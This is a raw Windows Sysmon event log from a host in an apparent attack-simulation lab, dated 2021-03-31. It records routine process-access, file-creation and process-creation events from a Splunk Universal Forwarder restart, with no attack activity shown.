12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.691{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.691{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.691{266CAFBE-64E9-6064-BF00-00000000AE01}67246728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d40f|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.706{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-64E9-6064-BF00-00000000AE01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2796 10341000x80000000000000007929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64E9-6064-BF00-00000000AE01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64E9-6064-BF00-00000000AE01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000007923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.675{266CAFBE-647D-6064-2F00-00000000AE01}27963752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64E9-6064-BF00-00000000AE01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+77c1aa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+b08def|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd792a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd534e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1a2a848|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000007922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.671{266CAFBE-64E9-6064-BF00-00000000AE01}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exesplunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2796C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000007921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.660{266CAFBE-647D-6064-2F00-00000000AE01}2796NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\conf-mutator.pidMD5=D49084353D18EC57574B16605BD22FFD,SHA256=F8C92956C3ED28F607E2105CB47C4C2E7BA1B2473EE74D08D16DEE2F2EBD40DB,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.628{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\wpcap.dll2021-03-31 12:02:49.628 11241100x80000000000000007919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.628{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vcruntime140.dll2021-03-31 12:02:49.628 11241100x80000000000000007918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.628{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\vccorlib140.dll2021-03-31 12:02:49.628 23542300x80000000000000007917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.582{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1200_POS4.jpgMD5=1E7D614892552BF17B2B08D30138EF64,SHA256=E37824373B3B7BA11537E7C32F933972B521C1FAF75D9A9585030F8DDDEFB304,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localEXE2021-03-31 12:02:49.504{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe2021-03-31 12:02:49.504 23542300x80000000000000007915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.488{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=625BA39DDA6E6F3DB2D6F8B82DF785D6,SHA256=59D8A2D10C3F06D06ECE0B256BABCFAE89955A28DD4E775385AACBFFA52532D1,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmprotocols.dll2021-03-31 12:02:49.473 11241100x80000000000000007913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmframework.dll2021-03-31 12:02:49.473 11241100x80000000000000007912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\qmflow.dll2021-03-31 12:02:49.473 11241100x80000000000000007911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys2021-03-31 12:02:49.473 11241100x80000000000000007910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\msvcp140.dll2021-03-31 12:02:49.473 11241100x80000000000000007909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\concrt140.dll2021-03-31 12:02:49.473 11241100x80000000000000007908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\Packet.dll2021-03-31 12:02:49.473 11241100x80000000000000007907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.473{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\ui\index.html2021-03-31 12:02:49.473 10341000x80000000000000007906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.410{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:49.286{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A2FCD3DD8ECE4AD2BCE4320AAAD5FC9B,SHA256=C72A8F444D0B6F328AE3462504A7DEB96D68363B6D27E072BF4FA98FC773D4F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.813{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64EA-6064-CB00-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64EA-6064-CB00-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:50.797{266CAFBE-64EA-6064-CA00-00000000AE01}65366528C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EA-6064-CB00-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 